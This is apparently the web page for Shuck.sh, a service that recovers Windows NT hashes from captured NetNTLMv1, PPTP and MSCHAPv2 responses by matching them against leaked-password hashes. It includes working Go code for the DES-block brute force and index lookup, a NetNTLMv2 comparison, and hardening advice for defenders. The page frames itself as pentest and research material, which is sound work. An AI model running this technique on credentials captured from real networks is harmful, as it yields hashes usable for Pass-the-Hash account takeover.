shuck.sh

Shuck hash before trying to crack it

Since 2013, the Have I Been Pwned (HIBP) service has centralized data leaks and raised awareness of them; its Pwned Passwords corpus is also distributed as NT hashes, which makes it a ready-made bank of compromised credentials.
Today, the excellent Crack.sh service demonstrates the weakness of DES-based algorithms by exhausting the 56-bit DES key space on Field Programmable Gate Arrays (FPGAs) in less than 26 hours.
In 2020, Chick3nman presented a hash-cracking optimization approach called Hash Shucking.
Shuck.sh is a free online service that shucks NetNTLMv1 (with or without ESS), PPTP VPN and WPA-Enterprise MSCHAPv2 challenges instantly against HIBP's NT-hash database. The result is the NT hash itself, directly usable in a Pass-the-Hash attack, without ever needing the plaintext.

The Technology

Behind Shuck.sh is simply an efficient, optimized binary search for DES-key collisions. In a NetNTLMv1 (or MSCHAPv2) response, the 16-byte NT hash is padded with five zero bytes and split into three 7-byte DES keys, so the third key contains only the last two bytes of the hash: a 2^16 brute force of that block reveals them. Those two bytes select a small subset of candidate NT hashes, located by binary search in a custom byte-reversed binary copy of HIBP's database, and only that subset is checked against the full response.


HIBP-DB-v8: 847,223,402 candidate hashes leaked

During a time-limited security assessment, if you capture ~100 NetNTLMv1 challenge-responses (with or without ESS) with a tool such as Responder, looking up the corresponding NT hashes (where they have leaked to HIBP) takes Shuck.sh only a few seconds (~10 s).


100 NetNTLMv1-ESS shucked in ~10 seconds

Shuck.sh also takes care of simplifying each token by converting it to a weaker form: ESS is stripped where possible (a NetNTLMv1-ESS response is a plain NetNTLMv1 response computed over the 8-byte challenge MD5(server challenge || client challenge)[:8], so it can be rewritten in the non-ESS layout), and the result is emitted either in a format Crack.sh accepts or directly as the NT hash if it has leaked to HIBP. Thus a NetNTLMv1-ESS/SSP, PPTP VPN or MSCHAPv2 challenge, which is paid and time-consuming on Crack.sh, can potentially be shucked instantly via Shuck.sh, for free!


Shuck.sh converts and provides optimized results in several Crack.sh- or Hashcat-compatible formats.

Finally, for a better understanding of DES-based challenge-response algorithms, Shuck.sh provides a Generator that builds tokens from a known plaintext or NT hash, and a Converter that recovers the NT hash from tokens via their DES keys.
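The mechanics described in The Technology above, the ESS reduction, and the Generator/Converter pair, as one added worked example written for this page (it is not ShuckNT's code and does not reproduce Shuck.sh's actual database layout or formats). It uses only Go's standard library crypto/des: building a NetNTLMv1 response from an NT hash (the generator side), turning an ESS exchange into its plain form, brute-forcing the 2^16 possible third-block keys to learn the hash's last two bytes, and locating candidates in a byte-reversed, sorted stand-in for the HIBP list with a binary search before the full DES check (the converter side). The NT hash of "password" (8846f7eaee8fb117ad06bdd830b7586c), the client challenge and the two other candidate hashes are constructed inputs.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"sort"
)

// desBlock encrypts one 8-byte block under a 7-byte key spread to 8 bytes; the low bit of each key byte is DES parity, which crypto/des ignores.
func desBlock(k, in []byte) []byte {
	k8 := []byte{k[0], k[0]<<7 | k[1]>>1, k[1]<<6 | k[2]>>2, k[2]<<5 | k[3]>>3,
		k[3]<<4 | k[4]>>4, k[4]<<3 | k[5]>>5, k[5]<<2 | k[6]>>6, k[6] << 1}
	c, _ := des.NewCipher(k8) // only fails on a wrong key length, impossible here
	out := make([]byte, 8)
	c.Encrypt(out, in)
	return out
}

// NtlmV1Response (generator side): the NT hash padded with 5 zero bytes yields three 7-byte DES keys, each encrypting the 8-byte challenge.
func NtlmV1Response(ntHash, challenge []byte) []byte {
	padded := append(append([]byte{}, ntHash...), make([]byte, 5)...)
	var resp []byte
	for i := 0; i < 21; i += 7 {
		resp = append(resp, desBlock(padded[i:i+7], challenge)...)
	}
	return resp
}

// EssChallenge reduces NetNTLMv1-ESS to plain NetNTLMv1: the DES input is MD5(serverChallenge || clientChallenge)[:8].
func EssChallenge(serverChallenge, clientChallenge []byte) []byte {
	sum := md5.Sum(append(append([]byte{}, serverChallenge...), clientChallenge...))
	return sum[:8]
}

// RecoverTail exploits the third key being hash[14:16] plus five zero bytes: 2^16 trial encryptions of the challenge reveal those two bytes.
func RecoverTail(response, challenge []byte) ([]byte, bool) {
	for k := 0; k < 1<<16; k++ {
		key := []byte{byte(k >> 8), byte(k), 0, 0, 0, 0, 0}
		if bytes.Equal(desBlock(key, challenge), response[16:24]) {
			return key[:2], true
		}
	}
	return nil, false
}

func reverse(b []byte) []byte {
	r := make([]byte, len(b))
	for i, v := range b {
		r[len(b)-1-i] = v
	}
	return r
}

// BuildIndex stores candidates byte-reversed and sorted, so hashes sharing their last two bytes form one contiguous run a binary search can find.
func BuildIndex(hexHashes []string) [][]byte {
	var idx [][]byte
	for _, h := range hexHashes {
		if raw, err := hex.DecodeString(h); err == nil && len(raw) == 16 {
			idx = append(idx, reverse(raw))
		}
	}
	sort.Slice(idx, func(i, j int) bool { return bytes.Compare(idx[i], idx[j]) < 0 })
	return idx
}

// Shuck (converter side) returns the hex NT hash reproducing the 24-byte response, or ""; only tail matches get the full three-block DES check.
func Shuck(response, challenge []byte, idx [][]byte) string {
	tail, ok := RecoverTail(response, challenge)
	if !ok {
		return ""
	}
	prefix := reverse(tail) // in the reversed index the hash tail is the leading bytes
	start := sort.Search(len(idx), func(i int) bool { return bytes.Compare(idx[i][:2], prefix) >= 0 })
	for i := start; i < len(idx) && bytes.Equal(idx[i][:2], prefix); i++ {
		if nt := reverse(idx[i]); bytes.Equal(NtlmV1Response(nt, challenge), response) {
			return hex.EncodeToString(nt)
		}
	}
	return ""
}

func main() {
	// Constructed exchange: NT hash of "password", server challenge 1122334455667788, an arbitrary client challenge (so ESS is in use), three-entry HIBP stand-in.
	nt, _ := hex.DecodeString("8846f7eaee8fb117ad06bdd830b7586c")
	sc, _ := hex.DecodeString("1122334455667788")
	cc, _ := hex.DecodeString("0123456789abcdef")
	challenge := EssChallenge(sc, cc)
	response := NtlmV1Response(nt, challenge)
	idx := BuildIndex([]string{
		"00112233445566778899aabbcc00586c", // constructed decoy: same tail, survives the search, fails the DES check
		"8846f7eaee8fb117ad06bdd830b7586c",
		"64f12cddaa88057e06a81b54e73b949b", // different tail: never reached by the search
	})
	fmt.Printf("NT response %x\nshucked NT hash %q\n", response, Shuck(response, challenge, idx))
}
```

The decoy shows why the two-byte filter is only a first stage: it shares the tail 586c and is therefore visited by the search, but its first two DES blocks do not match, so it is rejected. Against the real 847-million-entry list the same run-based lookup costs a handful of comparisons instead of a scan, which is what makes the per-token cost a fraction of a second.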

Shuck.sh was born from the wish to save time during customer assessments, to stop depending on a third-party online service whose availability is not guaranteed, and to be able to work autonomously on-premise.

Frequently Asked Questions

So, with shuck.sh, I don't have to use crack.sh anymore?
Absolutely NOT! Shuck.sh cannot guarantee a result: it depends entirely on the data leaks collected by Have I Been Pwned. No brute force and no rainbow tables are used, unlike Crack.sh.
Shuck.sh can therefore guarantee a result if, and only if, the target NT hash has leaked in the past. NetNTLMv1 challenges from computer accounts, whose long random passwords are generated by Active Directory itself, are therefore not relevant, as such hashes are practically never present in leaks.
Crack.sh remains a research project, meant to demonstrate to the community that the DES algorithm can no longer be considered secure at all. Shuck.sh follows the same logic and is only dedicated to saving time and relieving Crack.sh's computational load by exploiting the Hash Shucking technique (far less computation, more eco-responsible!).

My NetNTLMv1 challenges are secured with ESS/SSP: will I have potential results for free?
YES! Shuck.sh performs Hash Shucking with or without ESS/SSP and with any challenge value, all for free and with the same performance (seconds)!
Crack.sh processes NetNTLMv1 without ESS/SSP for free only when the challenge is exactly 1122334455667788, via dedicated rainbow tables. If the challenge differs or ESS/SSP is present, the job becomes chargeable and slower (an exhaustive DES key search instead of a table lookup).

I have customer's challenges from a security assessment. I don't want to submit them online, can I use Shuck.sh locally?
Yes, of course! Shuck.sh is based on a single script, ShuckNT, available on the author's GitHub. Anyone can run it locally after downloading the huge HIBP NT-hash database and converting it into the required format (detailed on GitHub).
The public online version of Shuck.sh is fully functional, integrates the latest HIBP database and, obviously, never keeps track of the jobs users submit.

Do you plan to process NetNTLMv2 hashes with Shuck.sh?
NetNTLMv2 responses are also captured by tools like Responder and follow the same challenge-response idea, but the cryptography differs: the response is a single HMAC-MD5 over the whole exchange, keyed with a 16-byte value derived from the NT hash, instead of three independent DES encryptions. There is no short DES key to brute-force and therefore no way to narrow the candidate list before a full check, so neither Shuck.sh nor Crack.sh is intended or able to handle such jobs.
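To see why the NetNTLMv1 shortcut does not carry over, here is the NetNTLMv2 computation as an added example (Go, standard library only; this is not code from Shuck.sh or Crack.sh). The user name, domain, blob and the NT hash of "password" are constructed inputs; the line layout user::domain:serverChallenge:ntProofStr:blob is the one Responder writes and hashcat mode 5600 reads. Checking one candidate costs two full HMAC-MD5 computations, and a wrong candidate yields a proof that shares nothing with the right one, so nothing lets you pre-filter hundreds of millions of hashes the way the third DES block does for NetNTLMv1.

```go
package main

import (
	"crypto/hmac"
	"crypto/md5"
	"encoding/hex"
	"fmt"
	"strings"
	"unicode/utf16"
)

// utf16le encodes text the way NTLM does: UTF-16LE, no BOM, no terminator.
func utf16le(s string) []byte {
	var out []byte
	for _, u := range utf16.Encode([]rune(s)) {
		out = append(out, byte(u), byte(u>>8))
	}
	return out
}

// NtlmV2Hash (NTOWFv2) is HMAC-MD5 keyed with the NT hash over UTF16LE(UPPER(user) || domain).
// The user name is upper-cased; the domain keeps its case.
func NtlmV2Hash(ntHash []byte, user, domain string) []byte {
	mac := hmac.New(md5.New, ntHash)
	mac.Write(utf16le(strings.ToUpper(user) + domain))
	return mac.Sum(nil)
}

// NtProofStr is HMAC-MD5 keyed with the NTLMv2 hash over serverChallenge || blob; the blob
// (timestamp, client challenge, AV pairs) travels in clear next to the 16-byte proof.
func NtProofStr(ntHash []byte, user, domain string, serverChallenge, blob []byte) []byte {
	mac := hmac.New(md5.New, NtlmV2Hash(ntHash, user, domain))
	mac.Write(serverChallenge)
	mac.Write(blob)
	return mac.Sum(nil)
}

// CheckNtlmV2Line tests one candidate NT hash against a captured line in the
// Responder / hashcat 5600 layout user::domain:serverChallenge:ntProofStr:blob.
func CheckNtlmV2Line(line, ntHashHex string) (bool, error) {
	p := strings.Split(line, ":")
	if len(p) != 6 {
		return false, fmt.Errorf("expected user::domain:challenge:proof:blob, got %d fields", len(p))
	}
	sc, err1 := hex.DecodeString(p[3])
	proof, err2 := hex.DecodeString(p[4])
	blob, err3 := hex.DecodeString(p[5])
	nt, err4 := hex.DecodeString(ntHashHex)
	if err1 != nil || err2 != nil || err3 != nil || err4 != nil || len(sc) != 8 || len(nt) != 16 {
		return false, fmt.Errorf("malformed hex field")
	}
	return hmac.Equal(NtProofStr(nt, p[0], p[2], sc, blob), proof), nil
}

// BuildLine assembles such a line from a known NT hash (the generator side).
func BuildLine(user, domain string, ntHash, serverChallenge, blob []byte) string {
	proof := NtProofStr(ntHash, user, domain, serverChallenge, blob)
	return fmt.Sprintf("%s::%s:%x:%x:%x", user, domain, serverChallenge, proof, blob)
}

func main() {
	// Constructed exchange: NT hash of "password", server challenge 1122334455667788 and a
	// minimal blob (signature, zero timestamp, client challenge, no AV pairs).
	nt, _ := hex.DecodeString("8846f7eaee8fb117ad06bdd830b7586c")
	sc, _ := hex.DecodeString("1122334455667788")
	blob, _ := hex.DecodeString("01010000000000000000000000000000" + "0123456789abcdef" + "0000000000000000")
	line := BuildLine("alice", "CORP", nt, sc, blob)
	fmt.Println(line)
	// The second candidate differs from the first in a single bit of the last byte.
	for _, cand := range []string{"8846f7eaee8fb117ad06bdd830b7586c", "8846f7eaee8fb117ad06bdd830b7586d"} {
		ok, err := CheckNtlmV2Line(line, cand)
		fmt.Printf("%s -> %v %v\n", cand, ok, err)
	}
}
```

Because the NT hash only ever enters as an HMAC key, a one-bit change in it flips the whole proof: there is no block that depends on only part of the hash, hence no cheap filter, and each leaked hash has to be tried in full.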

As a blue team, which algorithms are therefore to be favored in a Microsoft ecosystem?
Eradicate NetNTLMv1 (with or without ESS/SSP) wherever possible: on Windows this is the "Network security: LAN Manager authentication level" policy (LmCompatibilityLevel), which should be set to "Send NTLMv2 response only. Refuse LM & NTLM" (level 5) on clients, servers and domain controllers. Favor NetNTLMv2 or, better, Kerberos negotiations.

But, in the end, what is the definition of "Hash Shucking"?
Password shucking is a method of stripping layers off a re-hashed password hash, removing the benefits of the newer password hashing algorithm and reverting it to the weaker algorithm underneath. An attacker can use it against passwords that were re-hashed with a stronger algorithm on top of an older hash (or pre-hashed before the stronger algorithm was applied), shucking off the strong outer layer to attack the weak inner one.

RECENT NEWS

Shuck.sh is alive, and ShuckNT is released on GitHub!

The hash shucker dedicated to NetNTLMv1 (with or without ESS/SSP), PPTP VPN and WPA-Enterprise MSCHAPv2 tokens has been available online, and on-premise via GitHub, since the beginning of 2023!


The Crack.sh online service was unavailable for several weeks to months at the end of 2022

For several weeks to months during the last quarter of 2022, the Crack.sh online platform was unavailable or under maintenance. It has been fully functional again since the beginning of 2023!


Pwned Passwords list version 8 released by HIBP!

Pwned Passwords are hundreds of millions of real-world passwords previously exposed in data breaches. This exposure makes them unsuitable for ongoing use, as they are at much greater risk of being used to take over other accounts. Version 8 was released by Troy Hunt in December 2021 and contains 847,223,402 passwords.




What the Shuck? Layered Hash Shucking

Talk by Sam Croley (Chick3nman) at DEF CON's Password Village on August 8, 2020, on the concept of "What the Shuck? Layered Hash Shucking".


Contact

Feel free to report any comments, bugs or ideas for improvement regarding Shuck.sh or ShuckNT via GitHub or by contacting me directly.



100% Success NOT Guaranteed
Shuck.sh cannot guarantee 100% results, unlike Crack.sh, which guarantees that it will produce a working key for every job submitted. The processing carried out by Shuck.sh relies on the databases provided by HaveIBeenPwned and therefore depends on the data leaks recorded in those databases at a given time. Shuck.sh aims to minimize the time needed to obtain an NT hash from a DES-based authentication token, without claiming to be exhaustive. For completeness, turn to the excellent Crack.sh service.

Disclaimer
Any actions and/or activities related to the material contained within this website are solely your responsibility. Misuse of the information on this website can result in criminal charges being brought against the persons in question. The authors and Shuck.sh will not be held responsible in the event that criminal charges are brought against any individual misusing the information on this website to break the law.
This site contains materials that can potentially be misused. If you do not fully understand something on this site, then LEAVE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither the administration of this server, the authors of this material, nor anyone else affiliated in any way is going to accept responsibility for your actions.

© Copyright 2023+ ycam | shuck.sh is a free service developed and maintained by Yann CAM, Independent CyberSecurity Consultant, and is provided for research purposes only.